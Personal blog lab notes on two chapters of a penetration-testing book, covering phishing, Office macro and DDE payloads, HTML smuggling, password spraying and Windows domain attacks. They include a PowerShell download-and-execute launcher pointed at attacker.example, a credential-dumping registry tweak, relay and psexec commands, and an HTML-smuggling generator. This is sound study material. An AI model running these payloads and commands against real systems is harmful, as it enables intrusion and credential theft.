Posted in Blog, THP3

THP3 Ch 5 Review

Disclaimer: Educational purposes, personal reference, don’t do illegal hacking, IANAL, etc.

Note: THP3 is my primary source for this. I’m putting my thoughts and notes to help me remember the info while avoiding putting too much info from the book here. If you are considering buying the book, I highly recommend it. 

THP3 05 – The Screen – Social Engineering

Social engineering is a great way to get a foothold somewhere. If you're unfamiliar with the basics, check out Security through Education for some overview info. Chris Hadnagy's book Social Engineering: The Science of Human Hacking, 2nd ed., is also a good read. I'm about halfway through it right now. It's a nice non-technical read to balance out the technical stuff. Kim mentions (and I concur) that checking out the Defcon SE CTF info would be a good idea. There's a lot of good info out there, and SE attacks are still very effective. Plus it really is a nice balance to the hands-on-keyboard technical stuff. I wouldn't call it a "break", but a good change of pace.

Doppelganger Domains

See THP2 for more coverage – basically get a similar domain. Hope for typos, etc. Reap the rewards. Especially good for mimicking authentication pages and redirecting to the real page when creds are entered.
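To make the typo-hunting concrete, here's a hypothetical Python sketch of how candidate doppelganger domains could be generated – the substitution rules and the example domain are my own illustration, not from the book:

```python
# Hypothetical helper for brainstorming doppelganger domains. The
# substitution rules below are illustrative, not an exhaustive list.

def doppelgangers(domain, tld="com"):
    """Candidate look-alike registrations for <domain>.<tld>."""
    candidates = set()
    # Missing-dot squat: mail.example -> mailexample.com
    candidates.add(domain.replace(".", "") + "." + tld)
    name = domain.split(".")[0]
    # Character omission: example -> exmple
    for i in range(len(name)):
        candidates.add(name[:i] + name[i + 1:] + "." + tld)
    # Adjacent-character swap: example -> examlpe
    for i in range(len(name) - 1):
        candidates.add(name[:i] + name[i + 1] + name[i] + name[i + 2:] + "." + tld)
    # Look-alike character substitutions: l->1, o->0, rn->m
    for a, b in (("l", "1"), ("o", "0"), ("rn", "m")):
        if a in name:
            candidates.add(name.replace(a, b) + "." + tld)
    candidates.discard(name + "." + tld)  # don't list the real domain itself
    return candidates

print(sorted(doppelgangers("mail.example")))
```

Feed the output to a registrar availability check, then watch for typo traffic.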

You can use the Social Engineering Toolkit (SET) to clone authentication pages. And a lot of other things, so check out the user's manual available for download from the README page on GitHub. Going through the options is very straightforward. Setting up the VPS as the attack server is quick and easy. The config file needed to be updated to use Apache instead of Python – change APACHE_SERVER to ON (around line 95), set the APACHE_DIRECTORY (line 98ish), and adjust the HARVESTER_LOG (line 163ish). I want to go through the manual and some walkthroughs to get a better feel for the tool. I found a video from Packt on using SET that was helpful because it showed how to use it in a lab setup. I got it all set up with no problems. The Windows box I used really didn't want to accept the edits to the hosts file to use the cloned login pages I created. This may be because I'm working in a host-only network. This StackExchange has a good list of things to try for troubleshooting. None of which made my Windows machine happy. I could force it to go, but I'll have to look into it more. I wasn't working on a new VM, so that may have been the issue. But it also looks like IE can be a little finicky with the hosts file.

Kim also recommends storing any passwords found in an encrypted fashion, such as with your public PGP key, to protect the info in case of compromise. I think this is an important step to ensure that you (hopefully) could not be held liable if someone else obtained the same information elsewhere.

Creds with 2FA

On the defensive side, we like 2FA, preferably with something besides SMS. ReelPhish can be used to help deal with 2FA on the offensive side. Kim mentions running on Windows is preferred and gives a FireEye blog link. Other tools mentioned to bypass 2FA are evilginx, which was recently updated to version 2, and CredSniper. Both look like really good tools to experiment with for SE. Kim also mentions the importance of looking for places where 2FA might not be required.


Phishing

Phishing remains one of the most important and effective attack vectors. People are getting better about avoiding and reporting phishes, but it's still worth attempting. Every company will handle phishing-awareness training and reports of phishing differently. Reporting phishing emails should be encouraged, but it isn't always. And there will inevitably be someone having a "bad" day who will click the phish link. GoPhish can be used for automated attacks. Other tools are Phishing Frenzy using Ruby and King Phisher using Python. The automation is good for mass, straightforward attacks. For targeted campaigns, it would be beneficial to use OSINT to create hand-crafted phishes.

Microsoft Word/Excel Macro Files

Oh the joy of Office macros! Yes, they can be beneficial, but the security risk is quite high. By default, Office files support VBA (Visual Basic for Applications) code. AV is getting better about detecting these, but obfuscation can often allow them to work. Empire or Unicorn can be used to create payloads. The payload can be base64 encoded to get around some AV, though this is becoming well known and I've seen discussions of checking for specific keywords within base64 encoding. The process is straightforward – create the payload, pop into Excel, create a macro, replace the code with the payload, convince the receiver to Enable Content, and the payload executes. You can also embed .bat (batch) files into Office files. Newer versions likely won't execute them, but if you can convince the receiver to move the file to the desktop and execute it, you're good. LuckyStrike is available to make this more automated. VBad can also be used, but you have to enable macros yourself to use it. It heavily obfuscates your payloads and does several cool things. Call me paranoid, but I'd want to use it in a sandbox.
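The base64 step is easy to see in isolation. This is a minimal sketch of what launcher generators like Unicorn produce, assuming the usual PowerShell behavior that -EncodedCommand takes base64 of a UTF-16LE string; the download URL is a placeholder, not a real stager:

```python
import base64

# Sketch of the encoding step launcher generators (Unicorn, Empire) perform.
# PowerShell's -EncodedCommand expects the command as base64 of UTF-16LE.
# The URL is a placeholder, not a real stager.
command = "IEX (New-Object Net.WebClient).DownloadString('http://attacker.example/p')"
encoded = base64.b64encode(command.encode("utf-16-le")).decode()
launcher = "powershell -NoP -NonI -W Hidden -Enc " + encoded
print(launcher)
```

The resulting one-liner is what gets dropped into the VBA macro's Shell call.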

I think this sort of attack would be very effective in environments where people are used to getting documents from (somewhat) random people, especially at certain times of the year when attachments from people who aren't actually known are expected.

Non-Macro Office Files – DDE

This section starts with a nod to timing – if you just happen to be doing a pentest when new vulnerabilities are exposed, well, that can be quite helpful. The Dynamic Data Exchange (DDE) protocol vulnerability was announced during one of Kim's engagements, and the vuln can still be found. DDE is used for communication between applications. Sensepost wrote up how the exploit functions. There is an Empire stager to create the Word file and PS script (usestager windows/macroless_msword). Kim also mentions a toolkit to look for RCE in MS Office and generate malicious payloads, as well as subdoc attacks and a subdoc tool. It all looks straightforward, but I haven't tried these out yet.
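For reference, the published examples (e.g., Sensepost's) use a Word field along these lines – inserted via Insert > Quick Parts > Field and toggled with Alt-F9; syntax hedged from memory, so check the write-up before using it:

```
{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"}
```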

Hidden Encrypted Payloads

This section covers a couple of encryption tools. EmbedInHTML takes a file, encrypts it, and embeds it in an HTML file as a resource, complete with an automatic download routine. Demiguise generates HTML files containing an encrypted HTA (HTML Application) file.
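To make the EmbedInHTML idea concrete, here's a hypothetical Python sketch of the same trick – encrypt a payload (toy XOR here instead of the tool's real cipher), embed it as a base64 blob, and emit JavaScript that decrypts it and triggers the download. Function and file names are made up:

```python
import base64

def xor(data, key):
    """Toy XOR cipher standing in for the real tool's stream cipher."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def embed_in_html(payload, filename, key=b"k3y"):
    """Emit an HTML page whose script decrypts the embedded blob and
    triggers an automatic download of it, EmbedInHTML-style."""
    blob = base64.b64encode(xor(payload, key)).decode()
    return f"""<html><body><script>
var key = "{key.decode()}";
var raw = atob("{blob}");
var out = new Uint8Array(raw.length);
for (var i = 0; i < raw.length; i++)
    out[i] = raw.charCodeAt(i) ^ key.charCodeAt(i % key.length);
var a = document.createElement("a");
a.href = URL.createObjectURL(new Blob([out]));
a.download = "{filename}";
a.click();
</script></body></html>"""

page = embed_in_html(b"payload bytes here", "update.hta")
print(page[:40])
```

The point of the encryption is that the payload bytes never appear on the wire or on disk in cleartext until the browser rebuilds them, which frustrates inline inspection.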

Exploiting Internal Jenkins with Social Engineering

This chapter ends with a walkthrough of a Jenkins exploit that gets you full compromise if the application is unauthenticated. The problem is the app is hosted internally, so to get the code to execute, you need a victim in the org to visit a page with a stored XSS payload; WebRTC then exposes the victim's internal IP. Kim developed a tool specifically for this exploit. It takes the internal IP of a visitor and sends the exploit to all servers in the /24 range. This requires Jenkins prior to 2.x.
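The fan-out step can be sketched like this – given the internal IP WebRTC leaked, enumerate the /24 and probe each host on 8080. Function names and timeouts are my own, not from Kim's tool:

```python
import socket
from concurrent.futures import ThreadPoolExecutor

def targets_in_24(leaked_ip):
    """Every host address in the /24 of the IP that WebRTC leaked."""
    prefix = ".".join(leaked_ip.split(".")[:3])
    return [f"{prefix}.{host}" for host in range(1, 255)]

def jenkins_candidate(ip, port=8080, timeout=0.3):
    """Quick TCP connect check - Jenkins defaults to 8080."""
    try:
        with socket.create_connection((ip, port), timeout=timeout):
            return True
    except OSError:
        return False

def sweep(leaked_ip):
    """Return the hosts in the victim's /24 answering on 8080."""
    ips = targets_in_24(leaked_ip)
    with ThreadPoolExecutor(max_workers=64) as pool:
        up = pool.map(jenkins_candidate, ips)
    return [ip for ip, alive in zip(ips, up) if alive]

# e.g. sweep("10.0.0.23") would probe 10.0.0.1 through 10.0.0.254
```

In the real attack this probing runs in the victim's browser via JavaScript, but the /24 enumeration logic is the same.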

Basic steps: set up a Jenkins server on a Windows VM with a bridged adapter. Put the exploit tool on Kali and set it up. Then visit the attack website from another system. The webpage will hit the internal network over 8080 with the payload, find the Jenkins server, and get the server to download/decrypt/execute the Meterpreter payload. Your machine may want to make the war file a zip, so rename it if necessary. Setup was straightforward. And remember to make sure that you've set up a server on the attack machine and a listener. I used my Kali VM and a simple Python server. I watched the server and saw when the Jenkins machine called the payload, but I didn't get a shell. Something to play with later, but moving on for now.

As I was wrapping up this chapter, I also caught Episode 110 of the Privacy, Security, & OSINT Show that focused on testing your online security. The show notes have links to browser security tests that would be a good idea to run to check your opsec. One site specifically checks for WebRTC leaks – a nice way to see if the fixes you apply are working.

Wrap Up

This chapter was a bit of a brain break after the last couple. Good info, but I’d recommend branching out into some of the dedicated social engineering material if this is an area of interest. The technical info here is a great complement to the SE stuff I’ve been going through that is more focused on soft-skills.

Next Steps

  • Figure out what was keeping the Jenkins exploit from working
  • Finish the SE book I’m reading

THP3 Ch 4 Review

Disclaimer: Educational purposes, personal reference, don’t do illegal hacking, IANAL, etc.

Note: THP3 is my primary source for this. I’m putting my thoughts and notes to help me remember the info while avoiding putting too much info from the book here. If you are considering buying the book, I highly recommend it. 

THP3 04 – The Drive – Compromising The Network

The focus of this chapter will be corporate environments and living off the land. A definite red team focus. I’m looking forward to working through THP2 once I’m done with this to fill in some blanks. There won’t even be a vuln scan run in this chapter, which is great because it helps avoid detection.

I'll say upfront that this was a very frustrating chapter. Not because of what Kim covered, but because of the nature of setting up a more complicated virtual environment. Setting up the network was doable, but doing a mini-setup means there's not a lot going on in the network. So a lot of the tools will likely work better in an actual environment than in the lab. Since I was also working with the current versions of the various Windows systems, there were likely some exploits that have been dealt with. I've spent a lot of time working through the tools and have them "working", but not necessarily getting what they should from the network. Luckily I've got some labs available in a certification I'm working on that will let me get some additional practice. The experience with the tools and troubleshooting is invaluable, but it is frustrating when things don't work like they should. It did lead me to chase some alternatives and learn a ton. So in the end, it's all good. I'm okay continuing to bang away at this while continuing in the book. I'll take notes, keep track of tools, and apply the info as I'm working on other labs.

Finding creds outside the network

First up is getting an initial entry point. It can be complicated and resource-intensive. Kim recommends KISS and goes straight to password bruteforcing. This makes sense given all of the authentication required with various enterprise services. And finding things that authenticate using the victim's sign-on info can provide a foothold. This will involve password spraying. Going after external sources is helpful because the log-in attempts might not be logged, stuff on the perimeter might not require multi-factor authentication, people reuse passwords, and account lockout might not be enabled. In short, external sources often have a lower security level.

Kim notes that the fake mail server doesn’t exist anymore, so I feel like testing options are limited here. I’ll go back and research options for testing mail servers later.

Spray from SpiderLabs is a password-spraying tool that supports multiple enterprise services (OWA, Lync, Cisco Web VPN, etc.). Passwords to use should be chosen based on the company. Kim reports commonly successful passwords as those including season and year, local sports team and digits, looking at older breaches and using similar passwords, and company name plus year, numbers, and/or special characters. It's a good idea to run these scans slowly to avoid lockout. Seems like a good use of a server. Spray includes user and password files in several languages. Make sure to take a look at the password files and update them as appropriate with the current year and potentially sports teams as mentioned above.
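A quick hypothetical sketch of generating those commonly successful passwords (pattern list based on Kim's observations above; the helper name and output filename are mine):

```python
from datetime import date

def spray_candidates(company, year=None):
    """Candidate spray passwords from commonly successful patterns:
    season + year and company name + year/digits/special chars."""
    year = year or date.today().year
    candidates = []
    for season in ("Spring", "Summer", "Fall", "Winter"):
        candidates += [f"{season}{year}", f"{season}{year % 100}", f"{season}{year}!"]
    base = company.capitalize()
    candidates += [f"{base}{year}", f"{base}{year}!", f"{base}123", f"{base}#1"]
    return candidates

# One password per line, matching the simple wordlist format Spray's
# bundled lists use
with open("passwords-custom.txt", "w") as fh:
    fh.write("\n".join(spray_candidates("acme", year=2019)) + "\n")
```

Add local sports teams and breach-derived variants per target before running.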

To configure Spray, you’ll need to capture a POST request for a password attempt (use Burp or ZAP) and save the data to a file. Check out the README for Spray to get the details of how each spray option would need to be configured. I went through targeting the practice website. Script worked fine – just slow going.

Ruler by Sensepost can also do bruteforcing and can do some persistence exploitation as well. It does some autodiscovery of Exchange configuration and looks for creds. It’s a pretty cool tool. I’m going to have to find a way to do some work with both of these on test environments.

Moving through the network

This will be exploitation that occurs after gaining access to the network. It’s time to do some network setup. Microsoft licensing means it’s hard to find Windows VMs, and you have to build the network yourself. This has been on my to-do list, so it’s nice to have to do it for book club. I suspect I’ll need to pull in some additional resources. All of the Windows options expire after a set time.

First up, the server. Kim addresses Windows Server 2016 in THP3 and Windows Server 2012 in THP2. Microsoft provides VMs to test Edge and IE. They expire after 90 days, but Microsoft recommends creating a snapshot when first installing the VM to roll back to. That's what I've done previously. You can get demo ISOs for the servers from Microsoft. I recommend taking snapshots frequently as you go. While walking through the entire setup process when you've forked something is educational, it can get old. Also check your time settings when setting up your VMs to avoid time sync issues.

There are a few helpful walkthroughs dealing with VM setup and Windows Server 2016 – one from Couchbase and a Microsoft TechNet Wiki that includes complete lab setup info. Once you've got the VM loaded, it's time to set up Active Directory. Then add users using the Active Directory Administrative Center or PowerShell. I found the PowerShell option quicker – just note the changes won't show up until you refresh the management center.

 New-ADUser -Name "<name>" -SamAccountName "<name>" -AccountPassword(Read-Host -AsSecureString "Input Password:") -Enabled $true
 New-ADGroup -Name "<groupname>" -SamAccountName "<groupname>" -GroupScope "<scope>"
 Add-ADGroupMember -Identity <groupname> -Members <member1>,<member2>,<member3>

AD setup was surprisingly straightforward and intuitive (I’m sure I’ll regret saying that as I do more network setup), so onto setting up the client machines. This was a bit more finicky – make sure you’ve got everything on the same network and the network is set to private – which is annoyingly obscure on Win8.1. You’ll need to set your boxes to use the server as the DNS. Or at least that’s what I had to do because just adding it to the hosts file didn’t cut it. Luckily I’ve got a few more VMs to set up that I’ll continue figuring out the correct sequence. Sidenote – I’m also remembering just how much I disliked Windows 7 and 8.1.

Joining the domain once you’ve got the network lined up is pretty easy – Control Panel > System and Security > System > Advanced System Settings > Computer Name. Then click “Change” and select the Domain option. You can put in either the FQDN or the NetBIOS name. If you are having trouble using the NetBIOS option, try the FQDN.

Dealing with GPO…open up Group Policy Management on the server. Kim has the GPO set to disable the firewall, disable AV, disable updates, add the Helpdesk group to the local admins group, and link the GPO to the root domain. Going forward, I'll set up the GPO before adding other boxes to the network.

Important Steps for Setup

  • Download your VM builds (clients) and an ISO for the server from Microsoft

  • Load VMs – take snapshots before starting for the first time

  • Setup domain controller on server – set up static IP for server and set it to be the DNS server

  • Setup active directory on server

    • It would be a good idea to give the server a name that’s easy to remember, just makes life easier.

  • Create users and groups

  • Setup group policy (see below for details)

  • Setup clients to join domain

    • Put all on Host-Only network (Not required, but is my preferred option; could also do a NAT network)

    • Set up server to be DNS server (Network Connections – Change settings of this connection – Adjust IPv4 settings)

    • Make sure the network is set to private (start setting up sharing and it should ask if you want to make it private – Network status – View Network computers and devices). It’s not as straightforward as it is for WiFi, so you may have to dig around a bit.

    • Control Panel – System and Security – System – Advanced System Settings

      • Change name to something specific

      • Click on Domain radio button and put in domain name

  • Clone client machines as desired

Set up group policy on server

  • Open up Group Policy Management

  • Edit an existing GPO or create a new one

  • Disable AV – Computer configuration > Policies > Administrative Templates > Windows Components > Windows Defender > Real-time Protection

  • Disable Firewall

    • Computer configuration > Policies > Administrative Templates > Network > Network Connections > Windows Firewall

    • Computer configuration > Policies > Windows Settings > Security Settings > Windows Firewall > Protect all network connections > Disabled (set for Domain Profile and Standard Profile)

  • Disable updates – Computer configuration > Policies > Administrative Templates > Windows Components > Windows Update

  • Add Helpdesk to local admin group: Computer configuration > Preferences > Control Panel Settings > Local Users and Groups

    • New > Local Group > Administrators (Built-in)

    • Make sure action is Update

    • Add desired group

  • Only allow local login for Domain Admins, Local Administrators, and Helpdesk: Computer Configuration > Windows Settings > Security Settings > Local Policies > User Rights Assignment > Allow Logon Locally

  • Enable file and print sharing: Computer Configuration > Policies > Administrative Templates > Network > Network Connections > Windows Firewall > Allow inbound file and printer sharing

  • Disable SMB signing

    • SMB v1 disabled through a registry item in the GPO

    • SMB2 seems to need to be modified in the GPO to avoid breaking the policy

      • Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options

  • Make sure the GPO is linked to the domain

Overall, not too bad for the first time through. I got some errors about automatic logon, but I’m okay leaving that off since it wouldn’t likely be on in an enterprise environment.

On to installation of Internet Information Services (IIS)…Kim provides a link to a walkthrough. Run this command on your server, then make sure it worked by going to the IP in a browser.

 Install-WindowsFeature -name Web-Server -IncludeManagementTools

It also says to configure SPNs (Service Principal Names). I connected the IIS server to a host header.

 Setspn -A HTTP/<hostname> <iisServerName>
 Setspn -A HTTP/ csklabserver

I also set up a file share just to do it. I may go back and add a few things to the network, but this was a good start. Getting the GPO setup was the most fiddly part. I ran into some issues where my server decided to go on a field trip and I had to fix the time settings, but otherwise it went smoothly.

On The Network With No Creds

First up is doing some digging around the network without creds. This is working from getting on the network in whatever way and digging around. This could be from physically infiltrating the site or other methods.

Responder was the first tool. It worked well. Just a matter of waiting for something usable. You can either catch hashes and crack them or set up a popup to ask for creds. Not stealthy, but it would get the job done. Once you play with this a little, it's fairly easy to use. I did have to install some tools to get Responder running without complaint – hcxtools and hcxdumptool. That was on my 64-bit Kali VM, and I couldn't recreate the issue on the 32-bit one. A little odd, but it reinforces the importance of testing your tools and knowing your setup.

Get to the Responder directory (/usr/share/responder in regular Kali build), start Responder, get the info, then use Hashcat or similar to crack the NTLMv2 hashes. Hashcat has a ton of options, so take a look at the details. (Side note – you might also want to check out Crunch to generate custom wordlists if you can find out about the password policies in place or OSINT info on the accounts you capture hashes for.)

 ./Responder.py -I <interface> [options]
 hashcat -a <attackmode> -m <hashtype> <filetocrack> <wordlistfile> -r <rulefiles>

The MultiRelay option was much more of a pain to get working. I played with this quite a bit before a friend said he thought it only worked on Windows 2012 and earlier servers. This made sense to me because when I ran RunFinger to check the network, the only target identified was my Win7 box. So I had to download the ISO for 2012 and spin up a new VM for it. And add it as an additional domain controller. Good networking practice at least. Things got a little wonky, so I decided to start again using my Win2012 server as the initial DC. Got that set up as above, got the VMs back on the domain, and I was able to get MultiRelay working. Major lesson learned – know everything SMB is doing on your network before messing with it. There are quite a few things with SMB1 dependencies, so even though it's recommended to disable it, that can cause major issues. But the issue for MultiRelay is SMB signing, so that is what needs to be disabled in the GPO. I spent way more time messing with this than I should have, but I wanted to understand what was going on and what made the network vulnerable. I was able to get a Win2016 DC added to my 2012 network and use MultiRelay to get a shell on there. When you start with newer versions of Windows, the things that let MultiRelay work aren't there anymore. Trying to access my share with Windows 10, I basically got a security warning that said "nope".

MultiRelay related commands:

 # Start Responder in another terminal from the responder folder
 ./Responder.py -I eth0 -rv
 # Use RunFinger if desired to ID targets; run from responder/tools folder
 ./RunFinger.py -i <IPrange>
 # Run MultiRelay from responder/tools folder
 ./MultiRelay.py -t <targetIP> -u ALL [-c <commands or payload>]

A few more references…

User Enumeration Without Creds

Nmap has a script to enumerate users. Once I got the syntax down, this worked well. The main limitation is having a viable userlist. The default list pulled the administrator account. Combine this with some OSINT, and you should be able to enumerate the users. The only issue is watching the syntax.

 nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='realmname' <DomainControllerIP>

If you have a wordlist (like the Metasploit namelist provided on Kali), you add ,userdb=<filename>.

 nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='thp3lab',userdb=/usr/share/wordlists/metasploit/namelist.txt
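To build a viable userdb from OSINT'd names, a small permutation helper like this works – the username formats are common corporate conventions, not something from the book:

```python
def username_candidates(first, last):
    """Common corporate username formats for one person."""
    f, l = first.lower(), last.lower()
    # johnsmith, john.smith, jsmith, j.smith, smithj, johns
    return [f + l, f + "." + l, f[0] + l, f[0] + "." + l, l + f[0], f + l[0]]

# Build a userdb file for the nmap script from OSINT'd names
with open("userlist.txt", "w") as fh:
    for first, last in [("John", "Smith"), ("Jane", "Doe")]:
        fh.write("\n".join(username_candidates(first, last)) + "\n")
```

Then point the script at it with userdb=userlist.txt.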

Scanning the Network with CrackMapExec (CME)

This focused on using Empire's REST feature, so I'll be going back to play more with CME because there are a lot of options. I'm using my Kali VM since I'm using VirtualBox. There's a nice writeup here on the basics. Note – I had to use crackmapexec to call the program rather than cme as in the book; it depends on how you install it. I got a KeyError: 'launcher' error. Did some digging and found a fix. Looking at the comments, it seems Empire changes regularly, so any tools used with it should be checked before they are needed. The fix did work – you have to make a couple edits to the /usr/lib/python2.7/dist-packages/cme/modules/ file (see the link for details). I got it to run with Empire, but it didn't seem to connect. I think I may need to spend a week just messing around with Empire – it seems to be rather finicky.

Setting up the listener in Empire was a little fussy. Between the book, the Getting Shells 101 CME documentation, and general troubleshooting, I got my listener going. Make sure you’ve setup the cert in Empire. I ended up resetting Empire and generating a new cert.

 cd /opt/Empire

Then start Empire and setup the listener. Make the password whatever is in your config file for CME.

 ./empire --rest --password 'password'
 (Empire) > listeners
 (Empire: listeners) > uselistener http
 (Empire: listeners/http) > set Name cmeTest
 (Empire: listeners/http) > set Host <YourIP>:<Port>
 (Empire: listeners/http) > set Port <Port>
 (Empire: listeners/http) > set CertPath <CertPath> # default is data
 (Empire: listeners/http) > execute

CME also has a Meterpreter module. I gave that a shot since I’m pretty comfortable with Metasploit. Basically set up a handler, then run the CME using the metinject module. I wasn’t able to get a shell with this either, so I’m going to have to play with this some more. Both say the payloads have been executed, but no connection is made in either.
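For the metinject side, the handler setup is the usual multi/handler; the payload name here is my assumption, so match it to whatever metinject actually throws:

```
msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(multi/handler) > set LHOST <YourIP>
msf exploit(multi/handler) > set LPORT 8443
msf exploit(multi/handler) > exploit -j
```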

 crackmapexec IPrange -u username -p password -M <module> -o <options>
 crackmapexec -u user1 -p password -M empire_exec -o LISTENER=test #listener name
 crackmapexec -u user1 -p password -M metinject -o LHOST= LPORT=8443

You can also use Metasploit to see where the creds are valid using the smb_login module. CME is much faster though.

 msf > use auxiliary/scanner/smb/smb_login
 msf auxiliary(smb_login) > set RHOSTS <IP range>
 msf auxiliary(smb_login) > set SMBDomain <domain>
 msf auxiliary(smb_login) > set SMBUser <user>
 msf auxiliary(smb_login) > set SMBPass <password>
 msf auxiliary(smb_login) > services -p 445 -R
 msf auxiliary(smb_login) > run


I went chasing squirrels to better compromise the network. I didn’t get the foothold I wanted with the book’s tools, so I went looking for options. A friend had mentioned Impacket as an alternative to MultiRelay. Raj Chandel has a nice beginner’s guide, but like many of the guides the focus is listing what the tool does rather than putting it into practice. Metasploit Minute has a YouTube video that walks through some of the examples. I’ll keep working with this and the other network attacks. I like Impacket a lot and will keep exploring its capabilities. Once you get the hang of the syntax, it’s really easy to work with.

Found this nice write-up on using creds to own Windows boxes. I used the winexe option to get a shell and then used Empire to generate a one-liner. I was able to get an agent established and send commands using modules on my Win7 box. I didn't get the expected results though. Another step in the right direction at least. I suspect that the way I have my network set up means it doesn't have the necessary SMB vulns to make this work.

 winexe -U domain/user%password //IP cmd.exe
 # In Empire
 usestager multi/launcher
 set Listener http

I suspect a lot of the issues I’m running into have to do with working with a small network with limited modification. It also seems like with SMBv3.0, things get a lot less effective. I got multiple errors putting the launcher code into the systems I had shell on.

Since I did have creds, using the psexec module in Metasploit worked well. I did have to specify the domain though.

 msf > use exploit/windows/smb/psexec
 msf exploit(windows/smb/psexec) > set RHOST <targetIP>
 msf exploit(windows/smb/psexec) > set SMBPass <password>
 msf exploit(windows/smb/psexec) > set SMBUser <username>
 msf exploit(windows/smb/psexec) > set SMBDomain <domain>
 msf exploit(windows/smb/psexec) > run

This let me easily upload the Empire payloads, but I got errors with several of the options.

A list of related references in no particular order for future reference…

After Compromising Your Initial Host

Lots of info here about what to do once you have a shell. There's also a GitHub repo with a script containing a lot of the commands from The Red Team Field Manual, which can be used to search for commands from the book. I also found another GitHub repo with RTFM-inspired cheat sheets. I just got copies of it and The Blue Team Field Manual, and it's nice to have an idea of how to make the material more portable and easier to search. Pretty cool.

Privilege Escalation

Getting from a regular user to a privileged user is always a goal.

Methods Kim listed

  • Unquoted service paths

  • Finding insecure registry permissions for services

  • Check if the AlwaysInstallElevated registry key is enabled

I didn’t go digging too much with these on my network because there was a Privilege Escalation lab using Metasploitable3. So onto that…

Privilege Escalation Lab

Getting Metasploitable3 up and running can be a little more finicky than other VMs. It’s not difficult, just a little different. I think the intro blog from Rapid7 has the simplest install instructions. I did have to adjust the network adapter used, but nothing significant. There are a lot of options in Metasploitable3 and lots of resources online to go through.

Running an nmap scan showed lots of open ports. Kim chooses to target ManageEngine. Searching ManageEngine in Metasploit shows several potential exploits to use. Kim chooses the connection_id option to explore. This works, but isn't privileged, so it's on to checking out processes with ps. Kim points out Tomcat and that you can google to find where user info is stored. Then use dir to search for the file and type (basically the Windows equivalent of cat) to display it. Use the creds found to log in to the Tomcat management console to make sure they work…ok, how to do that? The easiest option is going to a browser. There are CLI options, but they didn't seem to be set up on the box. The browser was easier. Creds worked, so back to Metasploit to repeat the process with Tomcat. And then a connection error because Metasploitable3 decided to take a break. Got it back up and running, and the exploit worked as expected.

It was great to work with Metasploitable3 a bit. There’s definitely a lot to work with, so it stays on the list of things to work on. This chapter has been great to get a more extensive home lab built up. Having that experience will help me build a solid testing network on an old server I have.

Pulling Clear Text Credentials from Memory

Mimikatz has been an effective tool for getting passwords, but by default it can't pull cleartext passwords on Windows 10. To get the passwords back in LSASS, you can adjust a registry key. It just requires the user to log in again. Locking the workstation is the easiest way to accomplish this, triggering a lock screen (rundll32.exe user32.dll,LockWorkStation). Then run Mimikatz again to get the passwords.
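For reference, the registry key in question is WDigest's UseLogonCredential – setting it to 1 makes LSASS cache cleartext creds again after the next logon (from memory, so verify before relying on it):

```
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
```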

Mimikittenz is a tool to get passwords from target processes, like browsers. You can also write search expressions within Mimikittenz. And it doesn’t require local admin access. But you have to get the script onto the box.

I used the psexec module in Metasploit to get to where I could use Mimikatz. I did some work in both Win7 and Win10. I had to migrate Meterpreter to a 64-bit process in Win10. I could load and run Mimikatz. It did warn me I was using Mimikatz on a newer OS and recommended Kiwi instead. Running Mimikatz didn't get usable info (which was expected). I gave Kiwi a shot as recommended, and was able to get hashes.

I have been able to use Mimikatz in other labs, and it works well when the conditions are right. Kind of like most tools.

Getting Passwords from the Windows Credential Store and Browsers

The Windows Credential Store is where usernames, etc. are saved when MS IE or Edge save your info. The info is accessible by the user. There are scripts available to get the info – Get-WebCredentials and Gathering Windows Credentials. Empire also has an option to get creds from Chrome (payload powershell/collection/ChromeDump). There are also tools available to extract cookies and get info from file-sharing utilities.

Getting Local Creds and Information from OSX

For understandable reasons, most resources, including THP3, focus on Windows. That’s what is found in most enterprise environments. But Macs exist and may be fairly prevalent depending on the environment. There are similar attacks to get info from Macs. Kim talks about using Empire to target Macs, specifically setting up an Office macro payload – launch Empire, get a listener going, then usestager osx/macro, set OutFile /tmp/, and generate the payload. It’s Base64 code executed by Python, which is installed by default on Macs. Pop open Excel, create a macro, and swap out your payload for the macro code. Then save as an xlsm. I don’t have a Mac to test on, so just an interesting read for now. I’ve not had luck finding options for testing on Mac OS unfortunately, so until I can find a way, at least I’ve got some ideas.

Living Off of the Land in a Windows Domain Environment

This section focuses on using PowerShell Empire, but the takeaway is that if you can upload PowerShell scripts, you can do a lot of damage.

General notes as I continue to play with things…

Service Principal Names

Service Principal Names can provide info on databases and web servers. The setspn.exe file can be used – it’s on Windows by default, so handy to avoid having to deliver payloads. Basic format is

 setspn -T <domain> -F -Q */*

-T specifies the domain to query, -F performs the query at the forest rather than the domain level, -Q executes against each target domain or forest, and */* matches every SPN. There are a lot of other options, so it might be helpful to check out Microsoft’s setspn documentation.
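SPNs follow a serviceclass/host:port pattern (the port, and an optional service name, may be absent), which is what makes it easy to spot databases and web servers in the output. A quick Python sketch of parsing that shape (the sample SPNs are made up, and the parser ignores the optional trailing service name):

```python
# Parse the serviceclass/host:port shape that setspn output uses.
# Simplified: a real SPN may also have a trailing /servicename component.
def parse_spn(spn):
    service, _, rest = spn.partition("/")
    host, _, port = rest.partition(":")
    return {"service": service, "host": host, "port": port or None}

assert parse_spn("MSSQLSvc/sql01.corp.local:1433") == \
    {"service": "MSSQLSvc", "host": "sql01.corp.local", "port": "1433"}
assert parse_spn("HTTP/web01.corp.local") == \
    {"service": "HTTP", "host": "web01.corp.local", "port": None}
```

Filtering on service classes like MSSQLSvc or HTTP is the quick win here.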

Querying Active Directory

This section focuses on Empire and PowerView. Since Empire is still giving me fits (meaning getting Empire payloads to work and getting active agents), in the interest of time I decided to use some other tools to do similar work. Instead of using PowerView to get info about Active Directory users, I used an Impacket example. The GetADUsers example pulls info about AD users, including password-last-set and last-logon dates. PowerView has queries to get user, group-member, and computer info. It’s another one of those things I’ll keep working with as I troubleshoot Empire. There are also Metasploit modules available for similar tasks (in the post/windows/gather group).


Bloodhound

